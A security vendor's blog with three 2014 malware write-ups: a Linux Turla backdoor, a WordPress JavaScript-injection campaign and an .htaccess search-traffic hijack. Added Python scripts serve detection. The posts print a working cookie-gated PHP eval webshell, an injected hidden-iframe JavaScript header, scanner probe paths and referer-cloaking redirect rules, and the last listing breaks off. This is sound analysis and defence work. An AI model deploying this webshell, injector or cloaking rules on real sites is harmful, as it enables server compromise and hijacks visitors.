Saturday, December 13, 2014

'Turla' Malware Now Supports Linux

New Sample Of 'Turla' Backdoor - Linux Version

Turla Malware


A new 'Turla' Trojan sample has been discovered that targets Linux. Previous 'Turla' samples targeted Windows; the newly discovered sample adds Linux to the list of supported operating systems.

The malware is statically linked against all the external libraries it needs, which makes it independent of the libraries (and library versions) installed on the victim machine. 'Turla' is derived from the publicly available backdoor cd00r (http://www.phenoelit.org/stuff/cd00r.c). According to the analysis it does not require administrator (root) privileges and can be executed by any user.

Once the 'Turla' Trojan is executed, it starts a network sniffer and waits for a specific trigger packet. When that packet is received, 'Turla' activates its backdoor functionality. One caveat for anyone assessing how such a sample could have been started: on Linux, opening the raw socket a sniffer needs requires the CAP_NET_RAW capability, which on a stock system means root or a binary granted that capability.

The first 'Turla' Trojan sample was discovered in early 2012, when it was used to attack government computers and servers.

At the time this post was written, the new sample was already detected by almost 50% of the major antivirus engines.
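The one host-side observable the description above gives us is a process holding a packet-capture socket. The Python below is an added example, not code from the original post or from any Turla analysis: it parses /proc/net/packet (whose column layout is fixed by the kernel) and resolves each socket inode to its owning process through the /proc/<pid>/fd symlinks. The sample file content is constructed so the script runs offline; on a real host it reads the live file.

```python
"""List processes that hold AF_PACKET (packet capture) sockets on Linux.

A cd00r-style backdoor must sniff traffic to see its trigger packet, so on a
server that runs no legitimate capture tool (tcpdump, a NIDS, dhcpd, ...)
every AF_PACKET socket deserves a look.
"""
import os
import re

# /proc/net/packet columns as printed by the kernel (net/packet/af_packet.c):
#   sk RefCnt Type Proto Iface R Rmem User Inode
# Type 3 = SOCK_RAW, 2 = SOCK_DGRAM; Proto 0003 = ETH_P_ALL (capture everything).
HEADER_RE = re.compile(r"^\s*sk\s+RefCnt\s+Type\s+Proto\s+Iface\s+R\s+Rmem\s+User\s+Inode")


def parse_proc_net_packet(text):
    """Parse the text of /proc/net/packet into a list of socket dicts."""
    sockets = []
    for line in text.splitlines():
        if not line.strip() or HEADER_RE.match(line):
            continue
        _sk, _refcnt, stype, proto, iface, running, _rmem, user, inode = line.split()
        sockets.append({
            "type": int(stype),
            "proto": int(proto, 16),
            "ifindex": int(iface),        # 0 means bound to all interfaces
            "running": running == "1",
            "uid": int(user),
            "inode": int(inode),
        })
    return sockets


def socket_owners(inodes, proc_root="/proc"):
    """Map socket inode -> [(pid, comm)] by reading /proc/<pid>/fd symlinks."""
    wanted = {"socket:[%d]" % i: i for i in inodes}
    owners = {}
    try:
        pids = [p for p in os.listdir(proc_root) if p.isdigit()]
    except OSError:
        return owners
    for pid in pids:
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:                  # not our process, or it already exited
            continue
        for fd in fds:
            try:
                target = os.readlink(os.path.join(fd_dir, fd))
            except OSError:
                continue
            if target in wanted:
                try:
                    with open(os.path.join(proc_root, pid, "comm")) as f:
                        comm = f.read().strip()
                except OSError:
                    comm = "?"
                owners.setdefault(wanted[target], []).append((int(pid), comm))
    return owners


def find_packet_sockets(text, proc_root="/proc"):
    """Every packet socket together with the processes that own it."""
    sockets = parse_proc_net_packet(text)
    owners = socket_owners([s["inode"] for s in sockets], proc_root)
    for s in sockets:
        s["owners"] = owners.get(s["inode"], [])
    return sockets


# Constructed sample for the offline run: a SOCK_RAW/ETH_P_ALL socket owned by
# uid 1001 (what a sniffer started by an ordinary account would look like) and
# a DHCP-style SOCK_DGRAM/ETH_P_IP socket owned by root.
SAMPLE = """\
sk       RefCnt Type Proto  Iface R Rmem   User   Inode
ffff88003a1b2c00 3      3    0003   2     1 0      1001   48213
ffff88003a1b2d00 3      2    0800   0     1 0      0      51002
"""

if __name__ == "__main__":
    try:
        with open("/proc/net/packet") as f:
            data = f.read()
    except OSError:
        data = SAMPLE
    for s in find_packet_sockets(data):
        print("type=%d proto=0x%04x ifindex=%d running=%s uid=%d inode=%d owners=%s" % (
            s["type"], s["proto"], s["ifindex"], s["running"], s["uid"], s["inode"], s["owners"]))
```

Run it as root, since /proc/<pid>/fd of other users' processes is not readable otherwise. A capture socket that also switched the interface into promiscuous mode leaves a second trace: the kernel logs "device ethX entered promiscuous mode" and ip link shows the PROMISC flag.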

Sunday, November 23, 2014

Backdoor Malware Targeting WordPress Websites

Backdoor Malware In The Wild Targeting WordPress Websites



If your website gets reinfected every 20-30 minutes, if blacklisting authorities such as Google Safe Browsing do not keep up with the reinfection and fail to inform you, and if you run the WordPress platform with third-party plugins/themes, then it is likely that you suffer from a backdoor that our malware research lab recently discovered while cleaning customer websites.

You can check your site with our external and free scan using Quttera Free Website Malware Scanner


Background of the infection


How many websites attacked?


There is no exact number, but more than two thousand. During the first weeks of this infection Google did not recognize it. The malware code included logic to clean up the previous infection and insert a new one.

Which platforms were targeted?


The current version mostly targeted WordPress installations.


What malicious action was applied to victim sites and their visitors?


A successful attack injected hidden iframes into every JavaScript file. On home page load, the visitor's web browser loaded numerous JS files and was connected in the background, through those iframes, to several other websites.


How many files were infected?


All JavaScript files available on the attacked server.


Where the files were located?


All infected files were located in the wp-content and wp-includes directories.


The root cause


How backdoor was identified?


One of our customers was blacklisted by Google due to another kind of infection. During that investigation the current malware was uncovered as well. At the same time, we detected this infection on websites of our other customers, where it had bypassed Google's and others' radars.


Backdoor details


A backdoor (or simply a shell file) was uploaded by exploiting theme/plugin vulnerabilities. The following log excerpt shows how the attacker probed for an exploitable upload endpoint using HTTP HEAD requests. The paths are the upload and browse connectors of the FCKeditor, CKFinder and KCFinder file managers, which are often bundled inside themes and plugins; on this server every one of them returned 404:

"HEAD /fckeditor/editor/filemanager/connectors/aspx/upload.aspx HTTP/1.1" 404
"HEAD /fckeditor/editor/filemanager/connectors/asp/upload.asp HTTP/1.1" 404 299 "-" "-"
"HEAD /fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 299 "-" "-"
"HEAD /fckeditor/editor/filemanager/upload/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-"
"HEAD /fckeditor/editor/filemanager/upload/asp/upload.asp HTTP/1.1" 404 299 "-" "-"
"HEAD /fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 404 299 "-" "-"
"HEAD /fckeditor/editor/filemanager/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-"
"HEAD /fckeditor/editor/filemanager/connectors/asp/connector.asp HTTP/1.1" 404 318 "-" "-"
"HEAD /fckeditor/editor/filemanager/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-"
"HEAD /fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-"
"HEAD /fckeditor/editor/filemanager/browser/default/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-"
"HEAD /fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-"
"HEAD /includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-"
"HEAD /includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-"
"HEAD /includes/fckeditor/editor/filemanager/connectors/asp/upload.asp HTTP/1.1" 404 299 "-" "-"
"HEAD /includes/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 299 "-" "-"
"HEAD /includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-"
"HEAD /includes/fckeditor/editor/filemanager/upload/asp/upload.asp HTTP/1.1" 404 299 "-" "-"
"HEAD /includes/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 404 318 "-" "-"
"HEAD /includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-"
"HEAD /includes/fckeditor/editor/filemanager/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-"
"HEAD /includes/fckeditor/editor/filemanager/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-"
"HEAD /includes/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-"
"HEAD /includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-"
"HEAD /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-"
"HEAD /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-"
"HEAD /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-"
"HEAD /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx HTTP/1.1" 404 299 "-" "-"
"HEAD /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp HTTP/1.1" 404 299 "-" "-"
"HEAD /admin/fckeditor/editor/filemanager/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-"
"HEAD /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-"
"HEAD /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp HTTP/1.1" 404 299 "-" "-"
"HEAD /admin/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 299 "-" "-"
"HEAD /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx HTTP/1.1" 404 299 "-" "-"
"HEAD /admin/fckeditor/editor/filemanager/upload/asp/upload.asp HTTP/1.1" 404 299 "-" "-"
"HEAD /admin/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 404 299 "-" "-"
"HEAD /ckeditor/ckfinder/core/connector/asp/connector.asp HTTP/1.1" 404 299 "-" "-"
"HEAD /ckeditor/ckfinder/core/connector/php/connector.php HTTP/1.1" 404 299 "-" "-"
"HEAD /ckeditor/ckfinder/core/connector/aspx/connector.aspx HTTP/1.1" 404 318 "-" "-"
"HEAD /kcfinder/browse.php HTTP/1.1" 404 299 "-" "-"
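A probe like this is easy to pick out of an access log once you know the paths. The Python below is an added example, not part of the original post: it parses Apache combined-format lines and reports every client that enumerates the FCKeditor/CKFinder/KCFinder connector paths, keeping the misses (404) apart from any hit (200), because a 200 means the server really does expose an unauthenticated upload connector. The excerpt above has the client address and timestamp stripped, so the sample lines here are constructed, with addresses from the documentation ranges.

```python
import re
from collections import defaultdict

# Apache "combined" log format:
#   host ident authuser [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Upload / browse endpoints of bundled file managers that the probe in the post
# enumerated: FCKeditor connectors, CKFinder connectors and the KCFinder browser.
PROBE_RE = re.compile(
    r'/(?:fckeditor/editor/filemanager/(?:connectors|upload|browser/default/connectors)'
    r'/(?:php|asp|aspx)/(?:upload|connector)\.(?:php|asp|aspx)'
    r'|ckeditor/ckfinder/core/connector/(?:php|asp|aspx)/connector\.(?:php|asp|aspx)'
    r'|kcfinder/browse\.php)(?:\?|$)',
    re.I,
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_probes(lines, min_paths=5):
    """Group file-manager probes by client.

    Returns {ip: {"probes": distinct connector paths tried, "found": paths that
    answered 200}} for every client that tried at least min_paths distinct paths.
    """
    per_ip = defaultdict(lambda: {"paths": set(), "found": []})
    for line in lines:
        rec = parse_line(line)
        if rec is None or not PROBE_RE.search(rec["path"]):
            continue
        entry = per_ip[rec["ip"]]
        entry["paths"].add(rec["path"])
        if rec["status"] == "200":
            entry["found"].append(rec["path"])
    return {
        ip: {"probes": len(e["paths"]), "found": e["found"]}
        for ip, e in per_ip.items()
        if len(e["paths"]) >= min_paths
    }


# Constructed sample log: one scanner walking the connector list (one endpoint
# actually present), one normal visitor, and one single stray probe.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Nov/2014:03:14:01 +0000] "HEAD /fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 299 "-" "-"
203.0.113.7 - - [22/Nov/2014:03:14:01 +0000] "HEAD /fckeditor/editor/filemanager/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-"
203.0.113.7 - - [22/Nov/2014:03:14:02 +0000] "HEAD /includes/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 404 318 "-" "-"
203.0.113.7 - - [22/Nov/2014:03:14:02 +0000] "HEAD /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php HTTP/1.1" 404 299 "-" "-"
203.0.113.7 - - [22/Nov/2014:03:14:03 +0000] "HEAD /ckeditor/ckfinder/core/connector/php/connector.php HTTP/1.1" 200 0 "-" "-"
203.0.113.7 - - [22/Nov/2014:03:14:03 +0000] "HEAD /kcfinder/browse.php HTTP/1.1" 404 299 "-" "-"
198.51.100.4 - - [22/Nov/2014:03:15:10 +0000] "GET /wp-content/themes/twentyfourteen/js/functions.js HTTP/1.1" 200 5120 "http://example.com/" "Mozilla/5.0"
192.0.2.9 - - [22/Nov/2014:03:16:00 +0000] "HEAD /kcfinder/browse.php HTTP/1.1" 404 299 "-" "-"
"""

if __name__ == "__main__":
    for ip, info in sorted(find_probes(SAMPLE_LOG.splitlines()).items()):
        print("%s tried %d connector paths; live endpoints: %s"
              % (ip, info["probes"], info["found"] or "none"))
```

A client that walks the list and gets nothing but 404s is noise worth blocking; a client that gets a 200 tells you which component to remove or lock down before it is used for an upload.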


All of those were attempts to find a way to upload the following backdoor, which was then used to infect the server:

<?php
// Gate: only requests carrying the __mestore cookie with this 16-character prefix get any further
if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'],0,16)=='3469825000034634'){
    // Payload: the POST field "message" is URL-decoded, stripped of spaces, base64-decoded and inflated
    if (!empty($_POST['message']) and $message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message']))))){
        echo '<textarea id=areatext>';
        eval($message);              // runs whatever PHP the operator sent
        echo '</textarea>bg';
        exit;
    }
}
exit;


The backdoor decodes the content of the "message" field of the HTTP POST request (URL-decode, strip spaces, base64-decode, then inflate),

$message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message']))))

executes the result as PHP,

eval($message)

and prints the script output into the returned HTML, wrapped in a textarea so the operator's client can pick it out:

{echo '<textarea id=areatext>';eval($message);echo '</textarea>bg';exit;}} exit;

The script is generic: it permits execution of any PHP code provided in the "message" argument. The only gate is the __mestore cookie, whose first 16 characters must equal "3469825000034634"; a request without it gets an empty response, which keeps casual scanners and search engines from seeing anything interesting at the URL.

In this campaign the shell was used to run a script that infected all JS files on the compromised system.

The actual infection is a header prepended to every JS file:

/* Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/ */
function getCookie(b){
  var a=document.cookie.match(new RegExp("(?:^|; )"+b.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));
  return a?decodeURIComponent(a[1]):undefined
}
(function(){
  function e(b,a,c){var f=(b+'').toLowerCase();var g=(a+'').toLowerCase();var d=0;if((d=f.indexOf(g,c))!==-1){return d}return false}
  /* skip bots, WebKit browsers, Windows 8.1, X11 (Linux), phones and anything from Google */
  function h(){var b=['bots','AppleWebKit','Windows NT 6.3','X11','Phone ','Google'];var a=false;for(var c in b){if(e(navigator.userAgent,b[c])){a=true;break}}return a}
  /* marker cookie: the iframe is written once, then suppressed for 48 hours */
  var i=(getCookie("akelbriston19ure")===undefined);
  if(!h()&&i){
    document.write('<iframe width="112" height="132" style="position:absolute;margin-top:-1002px;" src="http://iframehost/something17.html"></iframe>');
    var j=new Date(new Date().getTime()+48*60*60*1000);
    document.cookie="akelbriston19ure=1; path=/; expires="+j.toUTCString()
  }
})();
/* Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt */
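Because the re-infection recurs every 20-30 minutes, stripping the prepended header without finding the shell that writes it is wasted effort. The Python scanner below is an added example, not the original post's tooling: it walks a WordPress tree and flags (a) PHP files that combine an eval() with input decoded through gzinflate(base64_decode(...)), the shape of the shell shown above, and (b) JavaScript files whose head carries the injected pattern (a document.write() of an iframe pushed off-screen by a large negative margin, plus the marker-cookie write). The fixture tree it builds in a temporary directory is constructed: a shell that mimics the one above with a different token, a JS file with the header, and a clean file of each type.

```python
import os
import re
import tempfile

# (a) Shape of the cookie-gated shell from the post: superglobal input,
#     gzinflate(base64_decode(...)) decoding and an eval() of the result.
PHP_INPUT_RE = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I)
PHP_DECODE_RE = re.compile(r"gzinflate\s*\(\s*@?\s*base64_decode\s*\(", re.I)
PHP_EVAL_RE = re.compile(r"\beval\s*\(", re.I)

# (b) The prepended JS header: an off-screen iframe written from script,
#     guarded by a marker cookie so it only fires once per visitor.
JS_IFRAME_RE = re.compile(
    r"document\.write\(\s*['\"]<iframe[^>]*margin-top:\s*-\d{3,}px", re.I)
JS_COOKIE_RE = re.compile(r"document\.cookie\s*=", re.I)


def is_php_shell(src):
    return bool(PHP_INPUT_RE.search(src) and PHP_DECODE_RE.search(src)
                and PHP_EVAL_RE.search(src))


def is_injected_js(src, head_bytes=4096):
    head = src[:head_bytes]        # the injection is prepended, so the top suffices
    return bool(JS_IFRAME_RE.search(head) and JS_COOKIE_RE.search(head))


def scan_tree(root):
    """Return sorted (kind, relative path) findings for every .php/.js file under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as f:
                    src = f.read()
            except OSError:
                continue
            if name.endswith(".php") and is_php_shell(src):
                findings.append(("php-shell", os.path.relpath(path, root)))
            elif name.endswith(".js") and is_injected_js(src):
                findings.append(("js-iframe", os.path.relpath(path, root)))
    return sorted(findings)


def build_fixture():
    """Constructed WordPress-like tree: one shell, one injected JS, two clean files."""
    root = tempfile.mkdtemp(prefix="wpscan-")
    files = {
        "wp-content/plugins/x/cache.php":
            "<?php if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'],0,16)=='0000000000000000'){"
            "if(!empty($_POST['message']) and $m=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message'])))))"
            "{echo '<textarea id=areatext>';eval($m);echo '</textarea>bg';exit;}} exit;",
        "wp-includes/js/jquery/jquery.js":
            "/* Copyright (C) 2007 Free Software Foundation, Inc. */ (function(){"
            "document.write('<iframe width=\"112\" height=\"132\" style=\"position:absolute;margin-top:-1002px;\" src=\"http://iframehost/x.html\"></iframe>');"
            "document.cookie=\"akelbriston19ure=1; path=/\"})();\n/*! jQuery v1.11.1 */ ...",
        "wp-includes/class-phpmailer.php":
            "<?php class PHPMailer { function decode($s) { return base64_decode($s); } }",
        "wp-content/themes/t/js/functions.js":
            "(function($){ $(document).ready(function(){ $('.menu').toggle(); }); })(jQuery);",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as f:
            f.write(body)
    return root


if __name__ == "__main__":
    root = build_fixture()
    for kind, rel in scan_tree(root):
        print("%-10s %s" % (kind, rel))
```

Treat hits as leads rather than verdicts: WordPress core and legitimate plugins call base64_decode, and a few call eval, so compare any flagged core file against a clean copy of the same WordPress version. Cleanup has to cover all three parts, the shell, the header in every JS file, and the upload endpoint that let the shell in, or the cycle simply restarts.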


Attack flow


So how did this work?

  1. Server A scanned the web for WordPress installations with known vulnerabilities.
  2. The backdoor/shell was uploaded to the servers found in step (1).
  3. Server B invoked the shell with PHP code that performed the JS file infection.
  4. Re-infection recurred every 20-30 minutes for as long as the shell stayed in place.


Malware clean-up


As a first step, we identified the organization that owned the IP address from which the shell was being invoked. We then contacted the hosting provider and filed a malware/abuse report.

We carried out all the necessary steps to clean up the 3K+ infected files, updated all outdated software and removed the vulnerable plugins.

If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.

Friday, May 23, 2014

Htaccess Hack Serving BlackHat SEO

Search Engine Traffic Hijacking

We clean infected websites on a daily basis, and the most common question we are asked is how to identify Search Engine Traffic Hijacking before the website gets infected further and Google (Yahoo, Bing or any other search engine provider) blacklists it. Usually a blacklisting is how a website owner first notices that the website is infected and compromised.

The first thing to check is the .htaccess file, which can be used to redirect traffic arriving from search engines to a hijacker's website. If your website is infected/hacked this way, then whenever someone finds your website through a search engine and clicks the link, they are redirected to the hijacker's website instead of yours.

How to find Search Engine Traffic Hijacking?

If you are experiencing traffic hijacking, most likely your .htaccess file has been updated with malicious code, or new .htaccess files have been planted across your sub-directories.

Search for .htaccess file(s) within all your sub-directories, check each one for suspicious code and make sure they contain nothing you did not put there.

The most common technique is to add the malicious rules to an existing .htaccess file. That way you, as the website owner, notice nothing strange, because the website keeps operating normally for you.

The other technique is to wipe the existing .htaccess file and replace it with one that contains only the malicious code.
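An added Python example of that search (not the post's own tooling): it walks a web root, reads every .htaccess it finds and flags the ones that pair a RewriteCond on HTTP_REFERER naming a search engine with a RewriteRule whose target is an absolute URL on a host you do not own and whose flags request an external redirect. The fixture it builds is constructed: the stock WordPress block, a harmless canonical-host redirect, and a hijack rule in the shape of the one shown further down.

```python
import os
import re
import tempfile

# A referer condition that names a search engine (the hijack keys on who sent the visitor)...
REFERER_COND_RE = re.compile(
    r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+\S*(?:google|yahoo|bing|msn|yandex|ask|aol|lycos)",
    re.I | re.M)
# ...combined with a rule whose target is an absolute URL and whose flags request an
# external redirect (R or R=30x). Everything else in the file is irrelevant here.
EXTERNAL_RULE_RE = re.compile(
    r"^\s*RewriteRule\s+\S+\s+(https?://[^\s\]]+)\s*\[([^\]]*)\]",
    re.I | re.M)
REDIRECT_FLAG_RE = re.compile(r"(?:^|,)\s*R(?:=30[12378])?\s*(?:,|$)", re.I)


def inspect_htaccess(text, own_hosts=()):
    """Return which hijack indicators an .htaccess body shows."""
    own = {h.lower() for h in own_hosts}
    foreign = []
    for m in EXTERNAL_RULE_RE.finditer(text):
        target, flags = m.group(1), m.group(2)
        host = re.match(r"https?://([^/:?]+)", target, re.I).group(1).lower()
        if REDIRECT_FLAG_RE.search(flags) and host not in own:
            foreign.append(target)
    has_referer_cond = bool(REFERER_COND_RE.search(text))
    return {
        "referer_condition": has_referer_cond,
        "foreign_redirects": foreign,
        "sets_cookie": "CO=" in text.upper(),   # the marker-cookie trick seen in the sample
        "suspicious": has_referer_cond and bool(foreign),
    }


def find_htaccess(webroot, own_hosts=()):
    """Walk webroot and return [(relative path, report)] for every .htaccess found."""
    results = []
    for dirpath, _dirs, files in os.walk(webroot):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        try:
            with open(path, "r", encoding="utf-8", errors="replace") as f:
                body = f.read()
        except OSError:
            continue
        results.append((os.path.relpath(path, webroot), inspect_htaccess(body, own_hosts)))
    return sorted(results)


WORDPRESS_DEFAULT = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

CANONICAL_HOST = """\
RewriteEngine On
RewriteCond %{HTTP_HOST} ^example\\.com$ [NC]
RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]
"""

# Shape of the hijack from the post, reduced to the conditions that matter here.
HIJACK = """\
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\\:\\/\\/)?([^\\/\\?]*\\.)?(google\\.|yahoo\\.|bing\\.).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
RewriteRule ^(.*)$   http://url-to-malicious-site.com/cgi-bin/r.cgi?h=%{HTTP_HOST}&u=%{REQUEST_URI}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
"""


def build_fixture():
    """Constructed web root: clean root .htaccess, a canonical redirect, a hijacked subdirectory."""
    root = tempfile.mkdtemp(prefix="htaccess-")
    for rel, body in {"": WORDPRESS_DEFAULT, "blog": CANONICAL_HOST, "wp-content/uploads": HIJACK}.items():
        d = os.path.join(root, rel)
        os.makedirs(d, exist_ok=True)
        with open(os.path.join(d, ".htaccess"), "w", encoding="utf-8") as f:
            f.write(body)
    return root


if __name__ == "__main__":
    root = build_fixture()
    for rel, report in find_htaccess(root, own_hosts=["example.com", "www.example.com"]):
        print("%-28s suspicious=%s foreign=%s" % (rel, report["suspicious"], report["foreign_redirects"]))
```

Pass every hostname you legitimately redirect to in own_hosts, otherwise a www canonicalisation shows up as a foreign redirect. Any file that reports suspicious=True should be diffed against your last known-good copy before it is touched, so the attacker's full rule set is preserved for the abuse report.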

Here is an example from a very popular website that we cleaned up recently. The malicious code was present only for a short period, yet that was enough to get the site blacklisted by Google; in fact, that is how the website administrator noticed it. The impact was that nearly 99% of the website's search traffic was redirected to other URLs.

Malware Investigation

External investigation of the website by the online remote malware scanner detected:
  1. Traffic redirection to a malicious site
  2. A hidden iframe pointing to a malicious IP address, appended as the last line of the body element of every HTML page
Investigation of the .htaccess files then showed that the infection added temporary (302) redirects to numerous URLs, some of which were already blacklisted by Google.




Hacked .htaccess file body example:

RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|like\sMac\sOS|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS}            ^off$
